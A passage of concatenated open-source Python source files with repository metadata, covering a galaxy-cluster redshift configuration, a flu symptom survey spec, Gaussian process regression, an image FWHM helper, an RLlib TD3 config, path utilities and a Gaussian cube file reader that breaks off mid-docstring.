# directory, otherwise the code won't be able to fine the filters.
# Read http://www.baryons.org/ezgal/filters.php to see all the filters
# ezgal has. You can also add your own filters if need be. Read
# http://www.baryons.org/ezgal/manual/file_formats.html#filter-file-format
# for more info.
# blue_band: Bluer of the two bands used above.
# red_band: Redder of the two bands used above.
#
# z_min: minimum possible redshift to be fit. This needs to be a decimal
# object, since the code uses that format under the hood to avoid
# floating point errors. Enter the redshift into the function as a
# string, to avoid floating point errors when it's being created.
# See the existing examples.
# z_max: maximum possible redshift to be fit. Sane format as z_min.
# Note: Choose these two to span a region where color is monotonic as a
# function of redshift.
# correction: Without any correction, the code doesn't necessarily produce
# absolutely correct redshifts. There can by systematic biases.
# To fix this, we can create a polynomial that takes uncorrected
# redshifts and turns them into the correct redshifts. This
# parameter is that polynomial. It assumes that the fit comes
# from `numpy.polynomial.polynomial.polyfit()` It is the
# coefficients of the polynomial, starting with the lowest power
# of z. To start, enter `[0, 1]` for this parameter. This means
# that the output z will be 0 + 1 * z, or just z. If you have a
# large sample of galaxy clusters with known redshifts, plot rsz
# redshifts against well-measured redshifts, and find the
# function that best fits, using
# `numpy.polynomial.polynomial.polyfit()`. This is what goes here.
# A linear fit is usually acceptable, and is what was used for
# both r-z and ch1-ch2. Note that those two both have fits close
# to `[0, 1]`, indicating there isn't much correction going on.
# slope_fit: This is the fit (same format as `correction`) that describes the
# slope of the red sequence as a function of redshift. As an initial
# guess, `[0, 0]` will normally be fine. To do this
# properly, you need to figure out what the slope of the red
# sequence is as a function of redshift, then plug that info in
# here.
#
# plot_lims: In the plots we create, we need to know the limits. This parameter
# is a list of 4 items: The minimum red magnitude, the maximum
# red magnitude, the minimum color, and the maximum color. These
# are all set in AB mags. The best way to choose these it to set
# them to span a large range, see where the points are, and hone
# in from there.
#
# ------------ Redshift Fitting Parameters -----------
#
# These parameters are very important, as they describe how the red sequence
# is determined. To do that properly, we need some background on how the code
# works. First, it counts up the number of galaxies near each RS model, and
# picks the model with the most nearby galaxies as an initial guess.
# It then selects those nearby galaxies as potential RS members, and performs
# chi-squared fitting on those to pick the model that best fits them. This is
# done twice, as an iterative process, to ensure that things converge.
# After that is done, we select the final red sequence members as those near
# the model selected as the redshift for the cluster.
#
# initial_mag: Magnitude cuts used in the initial guess fitting process. This
# is a list of the number of magnitudes brighter and fainter than
# the characteristic magnitude. Galaxies will pass this cut if
# they have a magnitude m such that:
# model_m* - initial_mag[0] < m < model_m* + initial_mag[1]
# Galaxies that pass this cut will be counted. You definitely want
# to choose a large bright cut, since the bright galaxies are the
# most important to determining the red sequence. The code
# performs a error cut, so the faint end cut isn't as important,
# but choosing a lower value (less faint) can often increase the
# "signal-to-noise", since faint galaxies don't matter as much.
# initial_color: How much bluer, then redder, than the RS model that galaxies
# can be to be counted during the initial fitting process.
# Galaxies will pass this cut if they have a color c such that:
# model_c - initial_color[0] < c < model_c + initial_color[1]
# Note that both entries in the list need to be positive due to
# how they are defined. Small numbers (0.1, 0.2) are best,
# since they provide the tightest restriction.
# bluer_color_cut: During the main fitting process, the code does color cuts
# on each side of the potential red sequence models. These
# are done from the characteristic color of the RS models.
# This parameter specifies the blue side of those cuts. This
# needs to be a list, where the cuts are for each successive
# iteration. Start with a wide value so that the true RS will
# be included from the very beginning, even if the initial
# guess isn't very good. Don't make it too big, though, since
# including lots of blue galaxies (that often have smaller
# error bars) can drag the fit away from the true RS. The
# final value should be roughly the size of the real RS, or
# maybe slightly smaller to increase "signal to noise". To
# tune these parameters, enable the `fitting_procedure`
# plot in the parameter file for your run, and see whether the
# color cuts are working properly.
# redder_color_cut: This functions the same as `bluer_color_cut`, just on the
# red side of the RS. The advice there applies here too.
# That said, the red cut can often be more forgiving than the
# blue cut, since there are less foreground objects on the
# red side to drag things away from the true RS.
# brighter_mag_cut: Same as the previous two parameters, except this is a plain
# magnitude cut (based on distance from the characteristic
# magnitude of the RS model) This needs to be large
# enough to include all the galaxies in the RS.
# dimmer_mag_cut: Same as brighter_mag_cut, just on the dim side. Often a small
# value for this is good, since throwing away the faint
# galaxies improves your signal to noise. The RS is most
# visible on the bright end, so going too faint here will make
# it harder for the code to distinguish the real red sequence.
# note on these last 4: For a galaxy to be selected as a red sequence member,
# it must have a mag m such that
# model_m* - brighter_mag_cut < m < model_m* + dimmer_mag cut
# then for each successive color iterations, the color c must be
# model_c - bluer_color_cut[i] < c < model_c + redder_color_cut[i]
# Only galaxies that pass both of these cuts will be called red sequence
# galaxies.
#
#
# After the redshift is fitted, we select the final RS members. This is a
# different value than the final value in the color cuts because those
# might be tuned to pick the densest part of the RS, rather than the
# whole things. These parameters should enclose the whole RS.
# final_rs_mag: A two item list that contains the brighter, then dimmer
# magnitude cut. They should follow the same rules as they
# did above.
# final_rs_color: A two item list that contains the bluer, then redder
# color cuts.
#
# Note that the code does error checking on the config parameters here, so if
# you've done something wrong, it will let you know what went wrong.
#
# ------------ MOST IMPORTANT THING OF ALL -----------------
#
# IF YOU'RE HAVING TROUBLE SETTING UP A NEW BAND, PLEASE DO NOT HESITATE TO
# EMAIL ME AT gillenbrown@gmail.com. I know this setup isn't the most elegant,
# and my documentation doesn't explain things as well as it can.
#
# Also, once you properly set up a band combination, consider submitting a pull
# request on GitHub so others can benefit from your work.
#
# -----------------------------------------------------------------------------
# IRAC ch1 - ch2
ch1_m_ch2 = dict()
ch1_m_ch2["color"] = "ch1-ch2"
ch1_m_ch2["blue_band"] = "ch1"
ch1_m_ch2["red_band"] = "ch2"
ch1_m_ch2["z_min"] = decimal.Decimal("0.7")
ch1_m_ch2["z_max"] = decimal.Decimal("1.7")
ch1_m_ch2["correction"] = [-0.166250545506, 1.12218430826]
ch1_m_ch2["slope_fit"] = [0, 0]
ch1_m_ch2["plot_lims"] = [18, 22, -1, 0.5]
ch1_m_ch2["initial_mag"] = [2.0, 0.0]
ch1_m_ch2["initial_color"] = [0.1, 0.1]
ch1_m_ch2["bluer_color_cut"] = [0.2, 0.1]
ch1_m_ch2["redder_color_cut"] = [0.2, 0.1]
ch1_m_ch2["brighter_mag_cut"] = 2.5
ch1_m_ch2["dimmer_mag_cut"] = 0
ch1_m_ch2["final_rs_mag"] = [2.0, 0.6]
ch1_m_ch2["final_rs_color"] = [0.15, 0.15]
# SDSS r - z
sloan_r_m_sloan_z = dict()
sloan_r_m_sloan_z["color"] = "sloan_r-sloan_z"
sloan_r_m_sloan_z["blue_band"] = "sloan_r"
sloan_r_m_sloan_z["red_band"] = "sloan_z"
sloan_r_m_sloan_z["z_min"] = decimal.Decimal("0.5")
sloan_r_m_sloan_z["z_max"] = decimal.Decimal("1.5")
sloan_r_m_sloan_z["correction"] = [0.01705775352432836, 1.0834470213733527]
sloan_r_m_sloan_z["slope_fit"] = [-0.00343316, -0.14489063]
sloan_r_m_sloan_z["plot_lims"] = [20, 23.5, 0, 3.5]
sloan_r_m_sloan_z["initial_mag"] = [2.0, 0.6]
sloan_r_m_sloan_z["initial_color"] = [0.2, 0.2]
sloan_r_m_sloan_z["bluer_color_cut"] = [0.25, 0.225]
sloan_r_m_sloan_z["redder_color_cut"] = [0.4, 0.3]
sloan_r_m_sloan_z["brighter_mag_cut"] = 1.4
sloan_r_m_sloan_z["dimmer_mag_cut"] = 0.6
sloan_r_m_sloan_z["final_rs_mag"] = [2.0, 0.6]
sloan_r_m_sloan_z["final_rs_color"] = [0.35, 0.35]
# ----------------- ADD NEW COLOR COMBO DICTS HERE ----------------------------
cfg_matches = {"ch1-ch2": ch1_m_ch2,
"sloan_r-sloan_z": sloan_r_m_sloan_z}
# -----------------------------------------------------------------------------
# store Vega to AB conversions. This stores factor, such that
# Vega_mag = AB_mag + factor, or AB_mag = Vega_mag - factor
# These were obtained from http://www.baryons.org/ezgal/filters.php
ab_to_vega = {"ch1": -2.787,
"ch2": -3.260,
"sloan_u": -0.904,
"sloan_g": 0.098,
"sloan_r": -0.146,
"sloan_i": -0.357,
"sloan_z": -0.521}
# ------------------ Validating this file ------------------------------------
#
# Don't add anything down here, the code here just checks that you filled
# things up properly.
all_keys = ["color", "blue_band", "red_band", "z_min", "z_max", "correction",
"slope_fit", "plot_lims", "initial_mag", "initial_color",
"bluer_color_cut", "redder_color_cut", "brighter_mag_cut",
"dimmer_mag_cut", "final_rs_mag", "final_rs_color"]
for color, cfg in cfg_matches.items():
# check that all the keys are there
for key in all_keys:
if key not in cfg:
raise ValueError("Please add the {} parameter to the {} \n"
"\tconfiguration dictionary in config.py.\n"
"\n".format(key, color))
# then check that there aren't any keys that shouldn't be there
for key in cfg:
if key not in all_keys:
raise ValueError("The parameter {} that you added to the {}\n"
"\tconfiguration dictionary is not needed.\n"
"Please remove it.\n".format(key, color))
# then validate the other parameters.
# the color should match
if color != cfg["color"]:
raise ValueError("The color you specified in the {} dictionary\n"
"\tdoes not match the name you gave it in the \n"
"\t`cfg_matches` dictionary, which is {}. \n"
"\tPlease fix this.\n".format(cfg["color"], color))
# the bands should match the name of the color
if color != "-".join([cfg["blue_band"], cfg["red_band"]]):
raise ValueError("The name of the bands you specified in the\n"
"\t`red_band` and `blue_band` parameters of the {}\n"
"\tdictionary doesn't match the color you gave: {}.\n"
"\tPlease fix this. The color should have the form:\n"
"\tblue_band-red_band.".format(color, color))
# these bands should have AB-Vega conversions
for band in [cfg["red_band"], cfg["blue_band"]]:
if band not in ab_to_vega:
raise ValueError("Please add {} to the `ab_to_vega` dictionary\n"
"\tin config.py.".format(band))
# the z_max and min need to be in decimal format
for z in ["z_max", "z_min"]:
if type(cfg[z]) != decimal.Decimal:
raise ValueError("The {} paramter in the {} config dictionary\n"
"\tneeds to be of type decimal. See the other\n"
"\timplemented ones for an example."
"\n".format(z, color))
# the correction and slope need to be a list with nonzero entries
for key in ["correction", "slope_fit",
"bluer_color_cut", "redder_color_cut"]:
if type(cfg[key]) != list or len(cfg[key]) < 1:
raise ValueError("The {} parameter in the {} configuration\n"
"\tdictionary needs to be a list with at\n"
"\tleast one entry.".format(key, color))
# the plot_lims needs to be a list of 4 values.
if type(cfg["plot_lims"]) != list or len(cfg["plot_lims"]) != 4:
raise ValueError("The parameter plot_lims in the {} configuration\n"
"\tdictionary needs to be a list with 4 items."
"".format(color))
# the initial mag, initial color, final mag, and final color are all
# lists with two values.
for key in ["initial_mag", "initial_color",
"final_rs_mag", "final_rs_color"]:
if type(cfg[key]) != list or len(cfg[key]) != 2:
raise ValueError("The parameter {} in the {} configuration\n"
"\tdictionary needs to be a list with 2 items,\n"
"\tas described in config.py.".format(key, color))
for key in ["brighter_mag_cut", "dimmer_mag_cut"]:
if type(cfg[key]) not in [float, int]:
raise ValueError("The parameter {} in the configuration dict\n"
"\tneeds to be a single value (ie not\n"
"\ta list, even if it only has one item)."
"".format(key))
# the bluer and redder color cuts need to have the same length
if len(cfg["bluer_color_cut"]) != len(cfg["redder_color_cut"]):
raise ValueError("The length of the `bluer_color_cut` and\n"
"\t`redder_color_cut` lists need to be the same\n"
"\tin the {} dictionary in config.py".format(color))
|
gillenbrown/rsz
|
rsz_code/core_rsz/config.py
|
Python
|
mit
| 16,969
|
[
"Galaxy"
] |
2b11567dc0947e1b5e459c7ab43d32422ffe518503910dcc539fbe14967112c9
|
class RepQ01(d.Question):
question = 'Did you have one or more of the following symptoms since your last visit?'
type = 'options-multiple'
blank = True
options = (
(0, 'Runny nose'),
(1, 'Stuffy nose'),
(2, 'Hacking cough'),
(3, 'Dry cough'),
(4, 'Sneezing'),
(5, 'Sore throat'),
(6, 'Muscle pain'),
(7, 'Headache'),
(8, 'Chest pain'),
(9, 'Feeling exhausted'),
(10, 'Feeling tired'),
(11, 'Loss of appetite'),
(12, 'Nausea'),
(13, 'Vomiting'),
(14, 'Diarrhoea'),
(15, 'Watery, bloodshot eyes'),
(16, 'Chills and feverish feeling'),
(17, 'Coloured sputum'),
)
class RepQ02(d.Question):
question = 'When did these symptoms started?'
type = 'date'
class RepQ03(d.Question):
question = 'Did you have fever? If yes, what was the highest temperature measured? Please estimate if you had fever, but did not measure.'
type = 'options-single'
options = (
(0, 'No'),
(360, 'Less than 37°C'),
(370, '37° - 37.5°C'),
(375, '37.5° - 38°C'),
(380, '38° - 38.5°C'),
(385, '38.5° - 39°C'),
(390, '39° - 39.5°C'),
(395, '39.5° - 40°C'),
(400, 'More than 40°C'),
)
class RepQ04(d.Question):
question = 'When was your temperature for the first time above 38°C?'
type = 'date'
class RepQ05(d.Question):
question = 'Did these symptoms develop abruptly with sudden high fever or chills?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
(2, "Don't know"),
)
class RepQ06(d.Question):
question = 'Did you consult a medical doctor for these symptoms?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
)
class RepQ07(d.Question):
question = 'Did you take medication for these symptoms?'
type = 'options-single'
options = (
(0, 'Tamiflu, Relenza, or another anti viral drug'),
(1, 'Antibiotics'),
(2, 'Antipyretics'),
(3, 'Anti-inflammatory drugs'),
(4, 'Vitamins'),
(5, 'Other'),
)
class RepQ08(d.Question):
question = 'Did you change your occupations due to these symptoms?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes, I staid at home'),
(2, 'Yes, but went to work/school as usual'),
(3, 'I staid at home, but was able to work'),
)
class RepQ09(d.Question):
question = 'How long did you staid at home?'
type = 'options-single'
options = (
(1, '1 day'),
(2, '2 days'),
(3, '3 days'),
(4, '4 days'),
(5, '5 days'),
(6, '6 days'),
(7, '1 week'),
(14, 'Less than 2 weeks'),
(21, 'Less than 3 weeks'),
(22, 'More than 3 weeks'),
)
class RepQ10(d.Question):
question = 'Do other people from your family/home have/had comparable symptoms?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
)
class RepQ11(d.Question):
question = 'According to our data you did not receive a seasonal flu vaccination?'
type = 'options-single'
options = (
(1, 'Yes'),
(0, 'No, meanwhile I have received a seasonal flu vaccination'),
)
class RepQ12(d.Question):
question = 'According to our data you did not receive a Mexican flu vaccination?'
type = 'options-single'
options = (
(1, 'Yes'),
(0, 'No, meanwhile I have received a Mexican flu vaccination'),
)
class Survey(d.Survey):
id = 'dev-survey-0.0'
rules = (
RepQ01,
d.If(~d.Empty(RepQ01)) (
RepQ02,
RepQ03,
RepQ04,
RepQ05,
RepQ06,
RepQ07,
RepQ08,
d.If(d.In(RepQ08, [1,3])) (
RepQ09
),
RepQ10,
d.If(~d.Equal(d.Profile('RegQ5'), 1)) (
RepQ11
),
d.If(~d.Equal(d.Profile('RegQ6'), 1)) (
RepQ12
),
)
)
|
chispita/epiwork
|
data/surveys/survey-spec.py
|
Python
|
agpl-3.0
| 4,170
|
[
"VisIt"
] |
9053b17a46fe0145109279cefa6fb724d2119db2d9e3417fb94ee12578b8ba04
|
"""
GP Regression Model
"""
import numpy as np
import time
####################################################################################################
def GPRegress(K_s,PrecMatrix,K_ss,y,return_covariance=False):
"""
Given input array of kernel values, precision matrix, etc, get predictive
distribution using Gaussian Process Regression.
(may be room for improvement as I only need to calculate diagonal elements
of covariance matrix for predictive points)
INPUTS:
K_s - (q x n) covariance function of predictive points relative to test points
PrecMatrix - (n x n) precision matrix of training points
K_ss - (q x q) Covariance matrix of predictive points
y - (n x 1) y values of training points
added an option to return the full covariance matrix, if needed to compare
regression on different inputs (added for spot models)
"""
#ensure all data are in matrix form
# K_s = np.matrix(K_s)
# K_ss = np.matrix(K_ss)
# PrecMatrix = np.matrix(PrecMatrix)
y = np.matrix(np.array(y)).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * y
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
var_s = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
#return predictive values and stddev for each input vector
if return_covariance: return np.array(f_s).flatten(), np.array(var_s)
else: return np.array(f_s).flatten(), np.array(np.sqrt(np.diag(var_s)))
####################################################################################################
|
nealegibson/GeePea
|
src/GPRegression.py
|
Python
|
gpl-3.0
| 1,566
|
[
"Gaussian"
] |
d29fb6ae5a80ee4649eddc4d37bfb57439e21d2a35f3e3d5d5ffd644a6b4ac82
|
'''
@title fwhm
@author: Rebecca Coles
Updated on Nov 15, 2017
Created on Oct 12, 2017
fwhm
This module holds a series of functions that I use to find the
full-well-half-maximum of a given curve.
Modules:
fwhm3D
This function accepts a 3D array and finds the FWHM of the image.
FWHM is the gaussian PSF full width half maximum (fit result) in pixels
'''
# Import #######################################################################################
from numpy import amax, median, mean, sqrt, sum
################################################################################################
class fwhm(object):
def __init__(self):
'''
Constructor
'''
def fwhm3D(self, array3D):
'''
Accepts a 3D array and finds the FWHM (in pixels) of the image.
FWHM is the gaussian PSF full width half maximum (fit result) in pixels
'''
maxi = amax(array3D)
floor = median(array3D.flatten())
height = maxi - floor
if height == 0.0: # if object is saturated it could be that median value is 32767 or 65535 --> height=0
floor = mean(array3D.flatten())
height = maxi - floor
fwhm = sqrt(sum((array3D>floor+height/2.).flatten()))
return fwhm
|
racoles/general_image_processing_functions
|
fwhm.py
|
Python
|
gpl-3.0
| 1,289
|
[
"Gaussian"
] |
5f00c00dabd90663cf8fdf49b01e14a258801c913e575c42045cca2a600d43e9
|
"""A more stable successor to TD3.
By default, this uses a near-identical configuration to that reported in the
TD3 paper.
"""
from ray.rllib.agents.ddpg.ddpg import DDPGTrainer, \
DEFAULT_CONFIG as DDPG_CONFIG
from ray.rllib.utils import merge_dicts
TD3_DEFAULT_CONFIG = merge_dicts(
DDPG_CONFIG,
{
# largest changes: twin Q functions, delayed policy updates, and target
# smoothing
"twin_q": True,
"policy_delay": 2,
"smooth_target_policy": True,
"target_noise": 0.2,
"target_noise_clip": 0.5,
# other changes & things we want to keep fixed: IID Gaussian
# exploration noise, larger actor learning rate, no l2 regularisation,
# no Huber loss, etc.
"exploration_should_anneal": False,
"exploration_noise_type": "gaussian",
"exploration_gaussian_sigma": 0.1,
"learning_starts": 10000,
"pure_exploration_steps": 10000,
"actor_hiddens": [400, 300],
"critic_hiddens": [400, 300],
"n_step": 1,
"gamma": 0.99,
"actor_lr": 1e-3,
"critic_lr": 1e-3,
"l2_reg": 0.0,
"tau": 5e-3,
"train_batch_size": 100,
"use_huber": False,
"target_network_update_freq": 0,
"num_workers": 0,
"num_gpus_per_worker": 0,
"per_worker_exploration": False,
"worker_side_prioritization": False,
"buffer_size": 1000000,
"prioritized_replay": False,
"clip_rewards": False,
"use_state_preprocessor": False,
},
)
TD3Trainer = DDPGTrainer.with_updates(
name="TD3", default_config=TD3_DEFAULT_CONFIG)
|
stephanie-wang/ray
|
rllib/agents/ddpg/td3.py
|
Python
|
apache-2.0
| 1,659
|
[
"Gaussian"
] |
c3f727bcb91032df880310c086e68af36f51314bae91ebd99fcd001c0fc08cdf
|
"""
"""
import os, sys
import py
class Checkers:
_depend_on_existence = 'exists', 'link', 'dir', 'file'
def __init__(self, path):
self.path = path
def dir(self):
raise NotImplementedError
def file(self):
raise NotImplementedError
def dotfile(self):
return self.path.basename.startswith('.')
def ext(self, arg):
if not arg.startswith('.'):
arg = '.' + arg
return self.path.ext == arg
def exists(self):
raise NotImplementedError
def basename(self, arg):
return self.path.basename == arg
def basestarts(self, arg):
return self.path.basename.startswith(arg)
def relto(self, arg):
return self.path.relto(arg)
def fnmatch(self, arg):
return self.path.fnmatch(arg)
def endswith(self, arg):
return str(self.path).endswith(arg)
def _evaluate(self, kw):
for name, value in kw.items():
invert = False
meth = None
try:
meth = getattr(self, name)
except AttributeError:
if name[:3] == 'not':
invert = True
try:
meth = getattr(self, name[3:])
except AttributeError:
pass
if meth is None:
raise TypeError(
"no %r checker available for %r" % (name, self.path))
try:
if py.code.getrawcode(meth).co_argcount > 1:
if (not meth(value)) ^ invert:
return False
else:
if bool(value) ^ bool(meth()) ^ invert:
return False
except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
# EBUSY feels not entirely correct,
# but its kind of necessary since ENOMEDIUM
# is not accessible in python
for name in self._depend_on_existence:
if name in kw:
if kw.get(name):
return False
name = 'not' + name
if name in kw:
if not kw.get(name):
return False
return True
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
Checkers = Checkers
def __div__(self, other):
return self.join(str(other))
__truediv__ = __div__ # py3k
def basename(self):
""" basename part of path. """
return self._getbyspec('basename')[0]
basename = property(basename, None, None, basename.__doc__)
def dirname(self):
""" dirname part of path. """
return self._getbyspec('dirname')[0]
dirname = property(dirname, None, None, dirname.__doc__)
def purebasename(self):
""" pure base name of the path."""
return self._getbyspec('purebasename')[0]
purebasename = property(purebasename, None, None, purebasename.__doc__)
def ext(self):
""" extension of the path (including the '.')."""
return self._getbyspec('ext')[0]
ext = property(ext, None, None, ext.__doc__)
def dirpath(self, *args, **kwargs):
""" return the directory Path of the current Path joined
with any given path arguments.
"""
return self.new(basename='').join(*args, **kwargs)
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
if sys.version_info < (2,3):
for x in 'u', 'U':
if x in mode:
mode = mode.replace(x, '')
f = self.open(mode)
try:
return f.read()
finally:
f.close()
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
if not cr:
content = self.read('rU')
return content.split('\n')
else:
f = self.open('rU')
try:
return f.readlines()
finally:
f.close()
def load(self):
""" (deprecated) return object unpickled from self.read() """
f = self.open('rb')
try:
return py.error.checked_call(py.std.pickle.load, f)
finally:
f.close()
def move(self, target):
""" move this path to target. """
if target.relto(self):
raise py.error.EINVAL(target,
"cannot move path into a subdirectory of itself")
try:
self.rename(target)
except py.error.EXDEV: # invalid cross-device link
self.copy(target)
self.remove()
def __repr__(self):
""" return a string representation of this path. """
return repr(str(self))
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
if not kw:
kw = {'exists' : 1}
return self.Checkers(self)._evaluate(kw)
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
return FNMatcher(pattern)(self)
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
if not isinstance(relpath, (str, PathBase)):
raise TypeError("%r: not a string or path object" %(relpath,))
strrelpath = str(relpath)
if strrelpath and strrelpath[-1] != self.sep:
strrelpath += self.sep
#assert strrelpath[-1] == self.sep
#assert strrelpath[-2] != self.sep
strself = str(self)
if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
if os.path.normcase(strself).startswith(
os.path.normcase(strrelpath)):
return strself[len(strrelpath):]
elif strself.startswith(strrelpath):
return strself[len(strrelpath):]
return ""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
return self.ensure(*args, **{"dir": True})
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
self.join(bestrelpath) == dest and if not such
path can be determined return dest.
"""
try:
if self == dest:
return os.curdir
base = self.common(dest)
if not base: # can be the case on windows
return str(dest)
self2base = self.relto(base)
reldest = dest.relto(base)
if self2base:
n = self2base.count(self.sep) + 1
else:
n = 0
l = [os.pardir] * n
if reldest:
l.append(reldest)
target = dest.sep.join(l)
return target
except AttributeError:
return str(dest)
def exists(self):
return self.check()
def isdir(self):
return self.check(dir=1)
def isfile(self):
return self.check(file=1)
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
current = self
l = [self]
while 1:
last = current
current = current.dirpath()
if last == current:
break
l.append(current)
if not reverse:
l.reverse()
return l
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
last = None
for x, y in zip(self.parts(), other.parts()):
if x != y:
return last
last = x
return last
def __add__(self, other):
""" return new path object with 'other' added to the basename"""
return self.new(basename=self.basename+str(other))
def __cmp__(self, other):
""" return sort value (-1, 0, +1). """
try:
return cmp(self.strpath, other.strpath)
except AttributeError:
return cmp(str(self), str(other)) # self.path, other.path)
def __lt__(self, other):
try:
return self.strpath < other.strpath
except AttributeError:
return str(self) < str(other)
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
ignore is an Exception class that is ignoredwhen calling dirlist()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
yield x
def _sortlist(self, res, sort):
if sort:
if hasattr(sort, '__call__'):
res.sort(sort)
else:
res.sort()
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
return self.strpath == str(other)
class Visitor:
def __init__(self, fil, rec, ignore, bf, sort):
if isinstance(fil, str):
fil = FNMatcher(fil)
if isinstance(rec, str):
self.rec = FNMatcher(rec)
elif not hasattr(rec, '__call__') and rec:
self.rec = lambda path: True
else:
self.rec = rec
self.fil = fil
self.ignore = ignore
self.breadthfirst = bf
self.optsort = sort and sorted or (lambda x: x)
def gen(self, path):
try:
entries = path.listdir()
except self.ignore:
return
rec = self.rec
dirs = self.optsort([p for p in entries
if p.check(dir=1) and (rec is None or rec(p))])
if not self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
for p in self.optsort(entries):
if self.fil is None or self.fil(p):
yield p
if self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
class FNMatcher:
def __init__(self, pattern):
self.pattern = pattern
def __call__(self, path):
pattern = self.pattern
if pattern.find(path.sep) == -1:
name = path.basename
else:
name = str(path) # path.strpath # XXX svn?
if not os.path.isabs(pattern):
pattern = '*' + path.sep + pattern
return py.std.fnmatch.fnmatch(name, pattern)
|
pexip/os-codespeak-lib
|
py/_path/common.py
|
Python
|
mit
| 12,413
|
[
"VisIt"
] |
70f18df9d5e91d992095a5f6dce3ade6b0e9fbbdd181efa853fc63d49ed5b92f
|
"""
Module for reading Gaussian cube files, which have become one of the standard file formats
for volumetric data in quantum chemistry and solid state physics software packages
(VASP being an exception).
Some basic info about cube files
(abridged info from http://paulbourke.net/dataformats/cube/ by Paul Bourke)
The file consists of a header which includes the atom information and the size as well
as orientation of the volumetric data. The first two lines of the header are comments. The
third line has the number of atoms included in the file followed by the position of the
origin of the volumetric data. The next three lines give the number of voxels along each axis
(x, y, z) followed by the axis vector. The last section in the header is one line for each
atom consisting of 5 numbers, the first is the atom number, the second is the charge, and
the last three are the x,y,z coordinates of the atom center. The volumetric data is straightforward,
one floating point number for each volumetric element.
Example
In the following example the volumetric data is a 40 by 40 by 40 grid, each voxel is 0.283459 units
wide and the volume is aligned with the coordinate axis. There are three atoms.
CPMD CUBE FILE.
OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z
3 0.000000 0.000000 0.000000
40 0.283459 0.000000 0.000000
40 0.000000 0.283459 0.000000
40 0.000000 0.000000 0.283459
8 0.000000 5.570575 5.669178 5.593517
1 0.000000 5.562867 5.669178 7.428055
1 0.000000 7.340606 5.669178 5.111259
-0.25568E-04 0.59213E-05 0.81068E-05 0.10868E-04 0.11313E-04 0.35999E-05
: : : : : :
: : : : : :
: : : : : :
In this case there will be 40 x 40 x 40 floating point values
: : : : : :
: : : : : :
: : : : : :
"""
import numpy as np
from monty.io import zopen
from pymatgen.core.sites import Site
from pymatgen.core.structure import Structure
from pymatgen.core.units import bohr_to_angstrom
# TODO: can multiprocessing be incorporated without causing issues during drone assimilation?
class Cube:
"""
Class to read Gaussian cube file formats for volumetric data.
Cube files are, by default, written in atomic units, and this
class assumes that convention.
"""
def __init__(self, fname):
"""
Initialize the cube object and store the data as self.data
Args:
fname (str): filename of the cube to read
"""
f = zopen(fname, "rt")
# skip header lines
for i in range(2):
f.readline()
# number of atoms followed by the position of the origin of the volumetric data
line = f.readline().split()
self.natoms = int(line[0])
self.origin = np.array(list(map(float, line[1:])))
# The number of voxels along each axis (x, y, z) followed by the axis vector.
line = f.readline().split()
self.NX = int(line[0])
self.X = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dX = np.linalg.norm(self.X)
line = f.readline().split()
self.NY = int(line[0])
self.Y = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dY = np.linalg.norm(self.Y)
line = f.readline().split()
self.NZ = int(line[0])
self.Z = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dZ = np.linalg.norm(self.Z)
self.voxel_volume = abs(np.dot(np.cross(self.X, self.Y), self.Z))
self.volume = abs(np.dot(np.cross(self.X.dot(self.NZ), self.Y.dot(self.NY)), self.Z.dot(self.NZ)))
# The last section in the header is one line for each atom consisting of 5 numbers,
# the first is the atom number, second is charge,
# the last three are the x,y,z coordinates of the atom center.
self.sites = []
for i in range(self.natoms):
line = f.readline().split()
self.sites.append(Site(line[0], np.multiply(bohr_to_angstrom, list(map(float, line[2:])))))
self.structure = Structure(
lattice=[self.X * self.NX, self.Y * self.NY, self.Z * self.NZ],
species=[s.specie for s in self.sites],
coords=[s.coords for s in self.sites],
coords_are_cartesian=True,
)
# Volumetric data
self.data = np.reshape(np.array(f.read().split()).astype(float), (self.NX, self.NY, self.NZ))
def mask_sphere(self, radius, cx, cy, cz):
"""
Create a mask for a sphere with radius=radius, centered at cx, cy, cz.
Args:
radius: (flaot) of the mask (in Angstroms)
